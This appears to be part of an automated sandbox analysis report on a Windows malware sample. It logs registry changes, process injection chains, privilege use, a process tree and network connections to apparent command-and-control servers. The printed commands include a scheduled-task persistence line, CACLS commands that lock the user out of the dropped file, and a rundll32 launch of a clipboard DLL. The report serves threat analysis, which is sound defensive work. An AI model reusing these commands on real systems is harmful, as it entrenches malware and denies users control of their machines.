Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ec685b70ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C1CB.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E6CA.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1540 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3236 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe
PID 3236 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe
PID 3236 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe
PID 3236 wrote to memory of 1388 N/A N/A C:\Users\Admin\AppData\Local\Temp\12D8.exe
PID 3236 wrote to memory of 1388 N/A N/A C:\Users\Admin\AppData\Local\Temp\12D8.exe
PID 3236 wrote to memory of 1388 N/A N/A C:\Users\Admin\AppData\Local\Temp\12D8.exe
PID 2112 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2112 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 2112 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\11FC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3236 wrote to memory of 1176 N/A N/A C:\Windows\system32\cmd.exe
PID 3236 wrote to memory of 1176 N/A N/A C:\Windows\system32\cmd.exe
PID 1692 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1692 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1692 wrote to memory of 524 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 3236 wrote to memory of 5032 N/A N/A C:\Users\Admin\AppData\Local\Temp\14ED.exe
PID 3236 wrote to memory of 5032 N/A N/A C:\Users\Admin\AppData\Local\Temp\14ED.exe
PID 3236 wrote to memory of 5032 N/A N/A C:\Users\Admin\AppData\Local\Temp\14ED.exe
PID 524 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 524 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 524 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 4520 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 4520 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 4520 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 3236 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\15BA.exe
PID 3236 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\15BA.exe
PID 3236 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\15BA.exe
PID 4168 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 4168 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 4168 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 3236 wrote to memory of 4244 N/A N/A C:\Users\Admin\AppData\Local\Temp\1712.exe
PID 3236 wrote to memory of 4244 N/A N/A C:\Users\Admin\AppData\Local\Temp\1712.exe
PID 3236 wrote to memory of 4244 N/A N/A C:\Users\Admin\AppData\Local\Temp\1712.exe
PID 4244 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1712.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4244 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1712.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4244 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\1712.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 5072 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 5072 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 5072 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 5072 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 5072 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 784 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1532 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1532 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1532 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 784 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 784 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe

"C:\Users\Admin\AppData\Local\Temp\3OJ24hE.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\11FC.exe

C:\Users\Admin\AppData\Local\Temp\11FC.exe

C:\Users\Admin\AppData\Local\Temp\12D8.exe

C:\Users\Admin\AppData\Local\Temp\12D8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\13D3.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\14ED.exe

C:\Users\Admin\AppData\Local\Temp\14ED.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\15BA.exe

C:\Users\Admin\AppData\Local\Temp\15BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\1712.exe

C:\Users\Admin\AppData\Local\Temp\1712.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 568

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\C005.exe

C:\Users\Admin\AppData\Local\Temp\C005.exe

C:\Users\Admin\AppData\Local\Temp\C1CB.exe

C:\Users\Admin\AppData\Local\Temp\C1CB.exe

C:\Users\Admin\AppData\Local\Temp\DCB7.exe

C:\Users\Admin\AppData\Local\Temp\DCB7.exe

C:\Users\Admin\AppData\Local\Temp\E6CA.exe

C:\Users\Admin\AppData\Local\Temp\E6CA.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 580

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 96.134.101.95.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 20.42.73.29:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 212.143.182.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
RU 85.209.11.85:41140 tcp
US 8.8.8.8:53 85.11.209.85.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
